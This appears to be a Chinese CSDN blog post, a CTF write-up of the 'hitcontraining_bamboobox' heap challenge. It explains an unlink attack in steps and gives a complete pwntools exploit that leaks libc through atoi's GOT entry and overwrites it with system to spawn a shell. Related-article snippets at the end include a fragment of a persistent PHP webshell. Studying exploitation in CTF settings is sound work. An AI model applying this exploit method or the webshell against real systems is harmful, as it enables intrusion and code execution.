【unlink】hitcontraining_bamboobox

最新推荐文章于 2023-12-02 01:08:35 发布
最新推荐文章于 2023-12-02 01:08:35 发布
阅读量199 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/116768730
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏
本文详细介绍了如何通过ida分析发现C++程序中堆溢出漏洞,并利用该漏洞进行内存操作,通过修改全局变量、执行特定函数来获取libc基址,最终实现system命令执行。过程包括申请内存块、构造fakechunk、修改got表等步骤,涉及的知识点包括内存管理、缓冲区溢出利用和动态链接库函数地址获取。
摘要由CSDN通过智能技术生成

【unlink】hitcontraining_bamboobox

1. ida分析

  1. 有存放全局指针的数组,存放格式为itemlist[0]size,itemlist[1]为指向item的指针

    在这里插入图片描述

  2. change时没有检测输入长度,存在堆溢出

    在这里插入图片描述

2.思路

  1. 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位

    在这里插入图片描述

  2. free chunk1,unlink后itemlist[1] ->itemlist[-2]

    在这里插入图片描述

  3. 再次编辑chunk0,即编辑itemlist数组,使得itemlist[0]=0x30;itemlist[1]=atoi

    在这里插入图片描述

  4. show(0),得到atoi的got地址,获得libc的基址,得到system的地址

    在这里插入图片描述

  5. 再次编辑chunk0,即修改atoi的got地址位system

    在这里插入图片描述

  6. 在输入命令的时候,输入sh,即执行system(‘sh’)

    在这里插入图片描述

3.exp

from pwn import *
p = process('./bamboobox')
#p=remote("node3.buuoj.cn",26874)
context.log_level = 'debug'

elf = ELF("./bamboobox")
libc = ELF("./libc-2.23.so")

atoi_got = elf.got['atoi']

def show():
    p.recvuntil("Your choice:")
    p.sendline(str(1))

def alloc(size,content):
    p.recvuntil("Your choice:")
    p.sendline(str(2))
    p.recvuntil("length of item name:")
    p.sendline(str(size))
    p.recvuntil("name of item:")
    p.sendline(content)

def change(idx,content):
    p.recvuntil("Your choice:")
    p.sendline(str(3))
    p.recvuntil("index of item:")
    p.sendline(str(idx))
    p.recvuntil("length of item name:")
    p.sendline(str(len(content)))
    p.recvuntil("new name of the item:")
    p.sendline(content)

def free(idx):
    p.recvuntil("Your choice:")
    p.sendline(str(4))
    p.recvuntil("index of item:")
    p.sendline(str(idx))

alloc(0x30,"aaaa")
alloc(0x80,"bbbb")
alloc(0x30,"cccc")
gdb.attach(p)
target = 0x6020c8   #not be last
fd = target - 0x18
bk = target - 0x10

payload = p64(0) + p64(0x30)
payload += p64(fd) + p64(bk)
payload += "a"*0x10
payload += p64(0x30) + p64(0x90)
change(0,payload)
gdb.attach(p)
pause()
free(1)
# x/30gx 0x6020c8
gdb.attach(p)
pause()
payload = p64(0) * 2
# print(hex(puts_got))
payload += p64(0x30) + p64(atoi_got)

change(0,payload)
gdb.attach(p)
pause()
show()
atoi_addr = u64(p.recvuntil("\x7f")[-6:]+'\x00\x00')
log.success(hex(atoi_addr))

libc_base = atoi_addr - libc.sym['atoi']
system = libc_base + libc.sym['system']

payload = p64(system)
change(0,payload)
gdb.attach(p)
pause()
p.recvuntil("Your choice:")
p.sendline("/bin/sh\x00")

# gdb.attach(p)
# pause()
p.interactive()
huzai9527
关注
专栏目录
文件操作unlink()
m0_46376834的博客
07-29 244
之前,建议先确认是否需要删除该文件以及备份重要数据。函数删除的文件将无法恢复,请谨慎操作。表示要删除的文件的路径和名称。
f_unlink删除非空文件夹
m0_47884636的博客
07-10 2889
f_unlink删除非空文件夹 f_unlink删除非空文件夹时需要遍历删除文件夹下每一个文件,这是我在网上找到的代码调试有点问题稍作修改后的版本,亲测可实现此既定功能,特做个记录。 FRESULT FS_DeleteIntFile(INT8S* path) { UINT i, j; FRESULT res; DIR dir; FILINFO fno; INT8S* path1; #if _USE_LFN fno.lfname = 0; /* Set nul
堆利用之unlink
chenzhenyu1983的博客
04-30 595
一 small bin,large bin等的内存结构 未分配的chunk |  pre chunk size  |   size  |F|C|P| |  fd       |         bk         | presize: 前一个块的大小(如果前一个块是空闲的) size:当前块的大小 F标志位:目前还没有用 C标志位:如果当前块已被分配,置1;否则,置0 P标志位:如果前一个块已被...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 762
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink
mcmuyanga的博客
03-02 1345
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 441
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
unlink test_link
最新发布
10-18
"unlink test_link" 这句话看起来像是在操作系统的命令行中尝试删除一个名为 "test_link" 的文件链接。在Unix或Linux系统中,`unlink` 是一个用于删除文件或符号链接的命令。如果你想了解这个操作的过程,比如它会...
PHP内存型木马
Mi1k7ea
12-09 7996
基本概念 PHP内存性木马即PHP不死马,一般会删除自身以进程的形式循环创建隐蔽的后门。 通常在AWD Web题中用得较多。 Demo及原理 nodie.php <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '/var/www/dvwa/.ski12.php'; $...
dentry_unlink_inode
05-23
`dentry_unlink_inode()` 是 Linux 内核中用于删除目录项(dentry)并解除其与 inode 之间关联的函数。在文件系统中,每个文件或目录都对应一个 inode,而目录项则是将文件名映射到相应的 inode 上的结构。当删除一...
HITCON training lab 11——bamboobox
04-23 589
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
bamboobox和unlink
m0_62326489的博客
07-14 178
hhh
关于wiki的Unlink攻击理解--附例题BUUCTF-hitcontraining_bamboobox1
qq_30528603的博客
12-02 266
我们知道P的fd和bk都是我们自己构造的。我们假设程序通过溢出或者UAF修改了chunk2的fd和bk,我这里让chunk2的fd指向free的got表地址,bk指向一段内存中我们可读可写可执行的地方(也就是能布置shellcode的)。这样构造的目的是改写下一个chunk的标志位,触发fake_chunk能够进行unlink操作,并且在第二个chunk的数据域构造一个伪chunk。其实就是所谓的断链操作,让P的前一个chunk指向后一个chunk,然后P的后一个chunk指回P的前一个chunk。
hitcontraining_unlink
z1r0的博客
01-13 399
hitcontraining_unlink 查看保护 在change功能里没有检查size大小。一开始直接打hook来着,结果最后add时出问题。。。。。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27530) else: r = process
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1074
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
hitcontraining_bamboobox的wp
wuyvle的博客
03-16 1181
是个堆题 add函数 change函数 没有判断大小可以进行unlink操作 伪造一个空闲 chunk。 通过 unlink 把 chunk 移到存储 chunk 指针的内存处。 覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。 覆盖 atoi 的 got 表为 system 函数地址。 给出参数 ‘sh’,调用 atoi 函数拿 shell。 add(0x40,b'a' * 8) add(0x80,b'b' * 8) add(0x80,b'c' * 8) ptr = 0x6020
Linux下堆溢出利用3-bamboobox解题思路之unlink
haibiandaxia的博客
09-08 669
#coding=utf8 from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') local = 1 elf = ELF('./bamboobox') if local: p = process('./bamboobox') libc = elf.libc else: p = remote('116.85.48.105',5005) libc = ELF('./libc.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值